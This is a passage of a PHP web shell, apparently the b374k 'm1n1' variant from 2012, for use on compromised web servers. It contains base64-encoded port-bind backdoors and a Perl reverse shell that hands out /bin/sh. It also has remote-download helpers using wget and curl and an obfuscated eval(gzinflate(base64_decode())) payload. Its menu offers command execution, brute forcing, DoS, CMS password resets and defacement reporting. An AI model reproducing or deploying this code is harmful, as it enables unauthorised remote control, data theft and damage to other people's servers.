  607.             return $buff;
  608.             }
  609.     }
  610.  
  611.     function tulis($file,$text)
  612.     {
  613.     $textz = gzinflate(base64_decode($text));
  614.     if($filez = @fopen($file,"w"))
  615.         {
  616.         @fputs($filez,$textz);
  617.         @fclose($file);
  618.         }
  619.     }
  620.    
  621.     function tulis_2($file,$text)
  622.     {
  623.     $textz = base64_decode($text);
  624.     if($filez = @fopen($file,"w"))
  625.         {
  626.         @fputs($filez,$textz);
  627.         @fclose($file);
  628.         }
  629.     }
  630.  
  631.     function ambil($link,$file)
  632.     {
  633.     if($fp = @fopen($link,"r"))
  634.         {
  635.         while(!feof($fp))
  636.             {
  637.             $cont.= @fread($fp,1024);
  638.             }
  639.         @fclose($fp);
  640.         $fp2 = @fopen($file,"w");
  641.         @fwrite($fp2,$cont);
  642.         @fclose($fp2);
  643.         }
  644.     }
  645.  
  646.     function which($pr)
  647.     {
  648.     $path = exe("which $pr");
  649.     if(!empty($path))
  650.         { return trim($path); }
  651.     else { return trim($pr); }
  652.     }
  653.  
  654.     function download($cmd,$url)
  655.     {
  656.     $namafile = basename($url);
  657.     switch($cmd)
  658.         {
  659.         case 'wwget': exe(which('wget')." ".$url." -O ".$namafile); break;
  660.         case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile); break;
  661.         case 'wfread' : ambil($wurl,$namafile);break;
  662.         case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
  663.         case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
  664.         case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
  665.         case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
  666.         default: break; }
  667.     return $namafile;
  668.     }
  669.  
  670.     function get_perms($file)
  671.     {
  672.         if($mode=@fileperms($file))
  673.             {
  674.             $perms='';
  675.             $perms .= ($mode & 00400) ? 'r' : '-';
  676.             $perms .= ($mode & 00200) ? 'w' : '-';
  677.             $perms .= ($mode & 00100) ? 'x' : '-';
  678.             $perms .= ($mode & 00040) ? 'r' : '-';
  679.             $perms .= ($mode & 00020) ? 'w' : '-';
  680.             $perms .= ($mode & 00010) ? 'x' : '-';
  681.             $perms .= ($mode & 00004) ? 'r' : '-';
  682.             $perms .= ($mode & 00002) ? 'w' : '-';
  683.             $perms .= ($mode & 00001) ? 'x' : '-';
  684.             return $perms;
  685.             }
  686.         else return "??????????";
  687.     }
  688.  
  689.     function clearspace($text){ return str_replace(" ","_",$text); }
  690.  
  691.     $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
  692.     $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  693.  
  694.     $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  695.     ?>
  696.  
  697. <html>
  698.     <head>
  699.         <link rel="shortcut icon" href="data:image/x-icon;base64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAMIOAADCDgAAAAAAAAAAAAAMDg7/FBMS/xgWFf8UFBT/FxcY/x8dHv8aGRn/GhgY/xoZGP8RFBT/DRAR/xMTEv8WFBP/FRQU/w0NDv8SERH/EBER/xYVFP8bGBf/GhgX/xoZGP8fHh3/FhcY/xYXF/8bGhn/ERMT/xESEv8TEhH/Hxwb/yMhIP8MCwv/EhER/xMTFP8ZGBj/GxkY/xgYF/8bGxn/HBoY/xIUFP8NERP/FBYX/xATEf8UFRP/ExMR/yooJv8kJCP/EREQ/w8ODf8VFBT/GxkY/xwaGf8YGBb/FxgW/xcYE/8RExD/DA8L/xATAf8TFQ3/EREN/xEQDf83NTL/Li0s/w0ODv8MDAz/FRUU/xUVFf8aGRj/HBsZ/xsbF/8WGRT/ExcJ/wwOEf8PDW7/BAYK/xESCf9RUEz/U1JQ/x8eHf8NDAz/Dg8P/xMUFP8QEhP/FxgY/xsbGP8aGxf/HB0S/xITBP8wLIH/enXa/2dpaf97e3D/ZGVi/xwdGv8MDAr/EREQ/xEREf8WFxf/Gxsa/xkaGf8bGxj/HBwW/xcZC/8eHWP/j4rc/z08P/8hIQb/ExUF/wQGAP8AAAD/ERAN/xERD/8REhH/FRYW/xoaGv8ZGhn/GBkX/xocFf8KDAH/VlGw/3h1zP8AAAH/AAQA/wwNLf8OC1f/RkY6/w4PDP8RERD/EhIR/xETE/8UFhb/ERIR/xESEP8bHBT/AwYD/1ZTlP+IhNf/AAAD/wAAZP8AABT/uLX//4SEeP8AAAD/FRUT/xEREf8TFBT/FhYW/zM0M/8lJiT/BAYC/wIEAP8NDSH/wcDN/0lFrv9QS+r/v7zz/8/O2/8BAwD/DQ4K/xISEf8QERD/DxER/wYICP8JDQ7/RkZF/1VVUv8xMir/AAAA/1VWUf//////qqnQ/2Zoaf8GCAv/AgYA/xESD/8UFBP/ExMT/xobG/85Ozv/PD4+/zQ1Nf9SUlH/f357/6Sknv+Hh3//AAAO/wAAHv8AAwD/Cw0E/w8RDf8QEhD/FRUV/xYVFf8MDw//FxYW/yspKP84OTn/SUpJ/2VkYv/Ozcr/r66i/wAAJv8VFzX/Cw4B/xUVEv8ZFxT/FBQT/xMVFf8XFxf/DhAR/yclJf85Njb/RkZF/2BgYf9/fX3/ZGRi/xsaE/8TEiL/ExQ5/wwQB/8YFxT/GxgW/xYVFP8TExT/FxYX/xAREf8eHRz/KCUk/yUjIv8aGhn/DQ0M/wAAAP8JCwr/FxcV/xATFf8TFRL/GhkW/xwZF/8YFxb/FBMT/xQUE/8RERH/ExIS/xEPDv8MDQz/EhEQ/xUVE/8PERP/Cg0Q/xIUFP8RFBL/FhYV/xwaGf8aFxb/ExMT/xISEv8QDw//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D%3D" type="image/x-icon" />
  700.         <title><?php print TITLE; ?> <?php echo VERSION; ?></title>
  701.         <script type="text/javascript">
  702.  
  703.         function tukar(lama,baru)
  704.             {
  705.             document.getElementById(lama).style.display = 'none';
  706.             document.getElementById(baru).style.display = 'block';
  707.             }
  708.  
  709.         </script>
  710.         <style type="text/css">
  711.             AKUSTYLE        { display:none; }
  712.             body            { background:#121212; }
  713.             A:link                  {COLOR: #4B90EB; TEXT-DECORATION: none }
  714.             A:visited       {COLOR: #4B90EB; TEXT-DECORATION: none }
  715.             A:hover         {text-shadow: 0pt 0pt 0.3em #4B90EB, 0pt 0pt 0.3em #4B90EB; color: #4B90EB; TEXT-DECORATION: none }
  716.             A:active        {color: #4B90EB; TEXT-DECORATION: none }
  717.             textarea        {BORDER-RIGHT:  #3e3e3e 1px solid; BORDER-TOP:    #3e3e3e 1px solid; BORDER-LEFT:   #3e3e3e 1px solid; BORDER-BOTTOM: #3e3e3e 1px solid; BACKGROUND-COLOR: #1b1b1b; font: Fixedsys bold; color: #aaa; }
  718.             *           { font-size:11px; font-family:Arial,Helvetica,sans-serif; color:#CDE6FA; }
  719.             #menu           { background:#121212; margin:2px 2px 2px 2px; }
  720.             #menu a         { padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; }
  721.             #menu a:hover       { background:#744F4F; border-bottom:1px solid #333333; border-top:1px solid #333333; }
  722.             .tabnet         { margin:15px auto 0 auto; border: 1px solid #333333; }
  723.             .main           { width:100%; }
  724.             .gaya           { color: #4C83AF; }
  725.             .your_ip        { color: #FF4719; }
  726.             .inputz         { background:#000000; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; color : #4B90EB; }
  727.             .inputzbut      { background:#121212; color:#666666; margin:0 4px; border:1px solid #444444; }
  728.             .inputz:hover,
  729.             .inputzbut:hover    { border-bottom:1px solid #4532F6; border-top:1px solid #D4CECE; color:#D4CECE; }
  730.             .output         { margin:auto; border:1px solid #FF0000; width:100%; height:400px; background:#000000; padding:0 2px; }
  731.             .cmdbox         { width:100%; }
  732.             .head_info      { padding: 0 4px; }
  733.             .b1         { font-size:30px; padding:0; color:#FF0000; }
  734.             .b2         { font-size:30px; padding:0; color: #FF9966; }
  735.             .b_tbl          { text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; }
  736.             .phpinfo table      { width:100%; padding:0 0 0 0; }
  737.             .phpinfo td     { background:#121212; color:#cccccc; padding:6px 8px;; }
  738.             .phpinfo th, th     { background:#191919; border-bottom:1px solid #333333; font-weight:normal; }
  739.             .phpinfo h2,
  740.             .phpinfo h2 a       { text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; }
  741.             .explore        { width:100%; }
  742.             .explore a      { text-decoration:none; }
  743.             .explore td     { border-bottom:1px solid #4B90EB; padding:0 8px; line-height:24px; }
  744.             .explore th     { padding:3px 8px; font-weight:normal; }
  745.             .explore th:hover,
  746.             .phpinfo th:hover   { border-bottom:1px solid #4C83AF; }
  747.             .explore tr:hover   { background:#3D6585; }
  748.             .viewfile       { background:#434343; color:#000000; margin:4px 2px; padding:8px; font-family:Monospace; }
  749.             .sembunyi       { display:none; padding:0;margin:0; }
  750.         </style>
  751.     </head>
  752. <body onLoad="document.getElementById('cmd').focus();">
  753.     <div class="main">
  754.         <!-- head info start here -->
  755.         <div class="head_info">
  756.             <table>
  757.                 <tr>
  758.                     <td>
  759.                         <table class="b_tbl">
  760.                             <tr>
  761.                                 <td>
  762.                                 <a href="?">
  763.                                 <span class="b1">b<span class="b2">3<span class="b1">7</span>4</span>k</span>
  764.                                 </a>
  765.                                 </td>
  766.                             </tr>
  767.                             <tr>
  768.                                 <td>
  769.                                 m1n1 Newbie3viLc063s v.2012
  770.                                 </td>
  771.                             </tr>
  772.                             <tr>
  773.                                 <td>
  774.                                 m0d by AltenatorIwnet
  775.                                 </td>
  776.                             </tr>
  777.                             <tr>
  778.                                 <td>
  779.                                     <? if(isset($auth_pass)){
  780.                                         echo "<form method='POST'>
  781.                                         <input type='SUBMIT' class='inputz' name='logout' value=' L0g 0ut '>
  782.                                         </form>";
  783.                                         }
  784.                                     ?>
  785.                                 </td>
  786.                             </tr>
  787.                         </table>
  788.                     </td>
  789.                     <td>
  790.                         <?php echo $buff; ?>
  791.                     </td>
  792.                 </tr>
  793.             </table>   
  794.         </div>
  795.         <!-- head info end here -->
  796.         <!-- menu start -->
  797.             <div id="menu">
  798.             <center>
  799.             <a href="?<?php echo "y=".$pwd; ?>">            <b>Explore</b></a>
  800.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">    <b>Shell</b></a>
  801.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=php">      <b>Eval</b></a>
  802.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">    <b>MySQL</b></a>
  803.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">  <b>PHP</b></a>
  804.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">    <b>NetSploit</b></a>
  805.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">   <b>Upload</b></a>
  806.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=mail">     <b>Mail</b></a>
  807.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=brute">    <b>BruteForce</b></a>
  808.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=readable"> <b>OpenDIR</b></a>
  809.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=dos">      <b>D0S</b></a><br><br>
  810.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=localdomain">  <b>LocalDomain</b></a>
  811.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=zone-h">        <b>Zone-H</b></a>
  812.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=symlink">        <b>Symlink</b></a>
  813.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=identify">        <b>Domain Script</b></a>
  814.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=sqli-scanner">        <b>SQLI Scan</b></a>
  815.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=web-info">        <b>Website Whois</b></a>
  816.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=port-scanner">        <b>Port-Scanner</b></a>
  817.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=wp-reset">        <b>WP Reset</b></a><br><br>
  818.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=jm-reset">        <b>Joomla Reset</b></a>
  819.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=cms-scanner">        <b>CMS Scanner</b></a>
  820.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=vb">        <b>VB Changer</b></a>
  821.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=string-encode">        <b>String Encoder</b></a>
  822.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysqlbackup">  <b>SQL Backup</b></a>
  823.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=whmcs">        <b>WHMCS Decoder</b></a>
  824.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=security-mode">        <b>Security Mode</b></a>
  825.             <a href="?<?php echo "y=".$pwd; ?>&amp;x=process">        <b>Process</b></a>
  826.             </center>
  827.         </div>
  828.             <!-- menu end -->
  829.            
  830.         <?php
  831.         if(isset($_GET['x']) && ($_GET['x'] == 'php'))
  832.             {
  833.             ?>
  834. <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
  835. <table class="cmdbox">
  836.  
  837. <tr>
  838. <td>
  839. <textarea class="output" name="cmd" id="cmd"><? eval(gzinflate(base64_decode('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